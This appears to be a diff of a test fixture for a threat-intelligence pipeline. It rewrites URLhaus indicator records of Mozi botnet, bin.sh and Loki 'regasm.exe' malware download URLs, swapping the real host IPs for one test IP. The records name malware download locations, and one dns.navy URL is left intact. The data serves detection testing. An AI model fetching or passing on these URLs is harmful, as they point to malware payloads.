"original": "{\"id\":\"960935\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960935/\",\"url\":\"http://89.160.20.156:42287/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29672,18 +29672,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.41.229:49596/Mozi.m", + "original": "http://89.160.20.156:49596/Mozi.m", "scheme": "http", "port": 49596, - "domain": "59.99.41.229", - "full": "http://59.99.41.229:49596/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49596/Mozi.m" }, - "ip": "59.99.41.229" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694801032Z", - "original": "{\"id\":\"960936\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960936/\",\"url\":\"http://59.99.41.229:49596/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.41.229\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029125800Z", + "original": "{\"id\":\"960936\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960936/\",\"url\":\"http://89.160.20.156:49596/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29721,18 +29721,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.229.232.193:39815/Mozi.m", + "original": "http://89.160.20.156:39815/Mozi.m", "scheme": "http", "port": 39815, - "domain": "42.229.232.193", - "full": "http://42.229.232.193:39815/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39815/Mozi.m" }, - "ip": "42.229.232.193" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694805049Z", - "original": "{\"id\":\"960937\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960937/\",\"url\":\"http://42.229.232.193:39815/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.229.232.193\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029132500Z", + "original": "{\"id\":\"960937\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960937/\",\"url\":\"http://89.160.20.156:39815/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29770,18 +29770,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.53.104.80:36568/Mozi.m", + "original": "http://89.160.20.156:36568/Mozi.m", "scheme": "http", "port": 36568, - "domain": "61.53.104.80", - "full": "http://61.53.104.80:36568/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36568/Mozi.m" }, - "ip": "61.53.104.80" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694809167Z", - "original": "{\"id\":\"960938\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960938/\",\"url\":\"http://61.53.104.80:36568/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.53.104.80\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029141100Z", + "original": "{\"id\":\"960938\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960938/\",\"url\":\"http://89.160.20.156:36568/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29819,18 +29819,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.141.45.45:32954/Mozi.m", + "original": "http://89.160.20.156:32954/Mozi.m", "scheme": "http", "port": 32954, - "domain": "222.141.45.45", - "full": "http://222.141.45.45:32954/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:32954/Mozi.m" }, - "ip": "222.141.45.45" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694813395Z", - "original": "{\"id\":\"960939\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960939/\",\"url\":\"http://222.141.45.45:32954/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.141.45.45\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029147800Z", + "original": "{\"id\":\"960939\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960939/\",\"url\":\"http://89.160.20.156:32954/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29868,18 +29868,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://211.195.3.122:57752/Mozi.m", + "original": "http://89.160.20.156:57752/Mozi.m", "scheme": "http", "port": 57752, - "domain": "211.195.3.122", - "full": "http://211.195.3.122:57752/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57752/Mozi.m" }, - "ip": "211.195.3.122" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694817973Z", - "original": "{\"id\":\"960933\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960933/\",\"url\":\"http://211.195.3.122:57752/Mozi.m\",\"url_status\":\"online\",\"host\":\"211.195.3.122\",\"date_added\":\"2021-01-14 15:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029154400Z", + "original": "{\"id\":\"960933\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960933/\",\"url\":\"http://89.160.20.156:57752/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29917,18 +29917,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.123.115:52221/Mozi.m", + "original": "http://89.160.20.156:52221/Mozi.m", "scheme": "http", "port": 52221, - "domain": "186.33.123.115", - "full": "http://186.33.123.115:52221/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52221/Mozi.m" }, - "ip": "186.33.123.115" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694821821Z", - "original": "{\"id\":\"960932\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960932/\",\"url\":\"http://186.33.123.115:52221/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.123.115\",\"date_added\":\"2021-01-14 15:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029161Z", + "original": "{\"id\":\"960932\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960932/\",\"url\":\"http://89.160.20.156:52221/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29966,18 +29966,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.44.251.66:58493/Mozi.m", + "original": "http://89.160.20.156:58493/Mozi.m", "scheme": "http", "port": 58493, - "domain": "125.44.251.66", - "full": "http://125.44.251.66:58493/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58493/Mozi.m" }, - "ip": "125.44.251.66" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694825768Z", - "original": "{\"id\":\"960931\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960931/\",\"url\":\"http://125.44.251.66:58493/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.44.251.66\",\"date_added\":\"2021-01-14 15:50:40 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029167900Z", + "original": "{\"id\":\"960931\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960931/\",\"url\":\"http://89.160.20.156:58493/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:40 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30015,18 +30015,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.174.88:57603/Mozi.m", + "original": "http://89.160.20.156:57603/Mozi.m", "scheme": "http", "port": 57603, - "domain": "117.222.174.88", - "full": "http://117.222.174.88:57603/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57603/Mozi.m" }, - "ip": "117.222.174.88" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694829665Z", - "original": "{\"id\":\"960930\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960930/\",\"url\":\"http://117.222.174.88:57603/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.174.88\",\"date_added\":\"2021-01-14 15:50:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029174500Z", + "original": "{\"id\":\"960930\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960930/\",\"url\":\"http://89.160.20.156:57603/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30064,18 +30064,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.202.70.238:45439/Mozi.m", + "original": "http://89.160.20.156:45439/Mozi.m", "scheme": "http", "port": 45439, - "domain": "117.202.70.238", - "full": "http://117.202.70.238:45439/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45439/Mozi.m" }, - "ip": "117.202.70.238" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694833683Z", - "original": "{\"id\":\"960929\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960929/\",\"url\":\"http://117.202.70.238:45439/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.202.70.238\",\"date_added\":\"2021-01-14 15:50:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029181100Z", + "original": "{\"id\":\"960929\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960929/\",\"url\":\"http://89.160.20.156:45439/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30113,18 +30113,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.163.220:58291/Mozi.m", + "original": "http://89.160.20.156:58291/Mozi.m", "scheme": "http", "port": 58291, - "domain": "117.222.163.220", - "full": "http://117.222.163.220:58291/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58291/Mozi.m" }, - "ip": "117.222.163.220" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694837680Z", - "original": "{\"id\":\"960928\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960928/\",\"url\":\"http://117.222.163.220:58291/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.163.220\",\"date_added\":\"2021-01-14 15:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029187700Z", + "original": "{\"id\":\"960928\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960928/\",\"url\":\"http://89.160.20.156:58291/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30162,18 +30162,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.251.18.157:52785/Mozi.m", + "original": "http://89.160.20.156:52785/Mozi.m", "scheme": "http", "port": 52785, - "domain": "117.251.18.157", - "full": "http://117.251.18.157:52785/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52785/Mozi.m" }, - "ip": "117.251.18.157" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694841818Z", - "original": "{\"id\":\"960927\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960927/\",\"url\":\"http://117.251.18.157:52785/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.251.18.157\",\"date_added\":\"2021-01-14 15:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029194400Z", + "original": "{\"id\":\"960927\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960927/\",\"url\":\"http://89.160.20.156:52785/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30211,18 +30211,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.9.198.150:38582/Mozi.m", + "original": "http://89.160.20.156:38582/Mozi.m", "scheme": "http", "port": 38582, - "domain": "123.9.198.150", - "full": "http://123.9.198.150:38582/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38582/Mozi.m" }, - "ip": "123.9.198.150" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694845976Z", - "original": "{\"id\":\"960924\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960924/\",\"url\":\"http://123.9.198.150:38582/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.9.198.150\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029201100Z", + "original": "{\"id\":\"960924\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960924/\",\"url\":\"http://89.160.20.156:38582/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30260,18 +30260,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.46.164.249:39503/Mozi.m", + "original": "http://89.160.20.156:39503/Mozi.m", "scheme": "http", "port": 39503, - "domain": "125.46.164.249", - "full": "http://125.46.164.249:39503/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39503/Mozi.m" }, - "ip": "125.46.164.249" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694850204Z", - "original": "{\"id\":\"960925\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960925/\",\"url\":\"http://125.46.164.249:39503/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.46.164.249\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029207700Z", + "original": "{\"id\":\"960925\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960925/\",\"url\":\"http://89.160.20.156:39503/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30309,18 +30309,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.14.32.234:53018/Mozi.m", + "original": "http://89.160.20.156:53018/Mozi.m", "scheme": "http", "port": 53018, - "domain": "123.14.32.234", - "full": "http://123.14.32.234:53018/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53018/Mozi.m" }, - "ip": "123.14.32.234" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694853991Z", - "original": "{\"id\":\"960926\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960926/\",\"url\":\"http://123.14.32.234:53018/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.32.234\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029214300Z", + "original": "{\"id\":\"960926\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960926/\",\"url\":\"http://89.160.20.156:53018/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30358,18 +30358,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.5.7.214:40698/Mozi.m", + "original": "http://89.160.20.156:40698/Mozi.m", "scheme": "http", "port": 40698, - "domain": "123.5.7.214", - "full": "http://123.5.7.214:40698/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40698/Mozi.m" }, - "ip": "123.5.7.214" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694857908Z", - "original": "{\"id\":\"960923\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960923/\",\"url\":\"http://123.5.7.214:40698/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.5.7.214\",\"date_added\":\"2021-01-14 15:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029220900Z", + "original": "{\"id\":\"960923\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960923/\",\"url\":\"http://89.160.20.156:40698/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30407,18 +30407,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://116.24.57.201:50060/Mozi.m", + "original": "http://89.160.20.156:50060/Mozi.m", "scheme": "http", "port": 50060, - "domain": "116.24.57.201", - "full": "http://116.24.57.201:50060/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50060/Mozi.m" }, - "ip": "116.24.57.201" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694861906Z", - "original": "{\"id\":\"960922\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960922/\",\"url\":\"http://116.24.57.201:50060/Mozi.m\",\"url_status\":\"online\",\"host\":\"116.24.57.201\",\"date_added\":\"2021-01-14 15:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029227400Z", + "original": "{\"id\":\"960922\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960922/\",\"url\":\"http://89.160.20.156:50060/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30456,18 +30456,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.48.21.16:47874/Mozi.m", + "original": "http://89.160.20.156:47874/Mozi.m", "scheme": "http", "port": 47874, - "domain": "115.48.21.16", - "full": "http://115.48.21.16:47874/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47874/Mozi.m" }, - "ip": "115.48.21.16" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694865963Z", - "original": "{\"id\":\"960921\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960921/\",\"url\":\"http://115.48.21.16:47874/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.48.21.16\",\"date_added\":\"2021-01-14 15:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029234100Z", + "original": "{\"id\":\"960921\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960921/\",\"url\":\"http://89.160.20.156:47874/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30514,7 +30514,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.694869811Z", + "ingested": "2021-12-13T08:40:08.029240700Z", "original": "{\"id\":\"960919\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960919/\",\"url\":\"http://perezluzwsdycafeyzmn.dns.navy/perdoc/regasm.exe\",\"url_status\":\"online\",\"host\":\"perezluzwsdycafeyzmn.dns.navy\",\"date_added\":\"2021-01-14 15:46:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"exe\",\"Loki\",\"opendir\"]}", "category": "threat", "type": "indicator", @@ -30554,18 +30554,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://59.58.148.90:33799/bin.sh", + "original": "http://89.160.20.156:33799/bin.sh", "scheme": "http", "port": 33799, - "domain": "59.58.148.90", - "full": "http://59.58.148.90:33799/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33799/bin.sh" }, - "ip": "59.58.148.90" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694873628Z", - "original": "{\"id\":\"960920\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960920/\",\"url\":\"http://59.58.148.90:33799/bin.sh\",\"url_status\":\"online\",\"host\":\"59.58.148.90\",\"date_added\":\"2021-01-14 15:46:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.029247200Z", + "original": "{\"id\":\"960920\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960920/\",\"url\":\"http://89.160.20.156:33799/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:46:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30611,7 +30611,7 @@ } }, "event": { 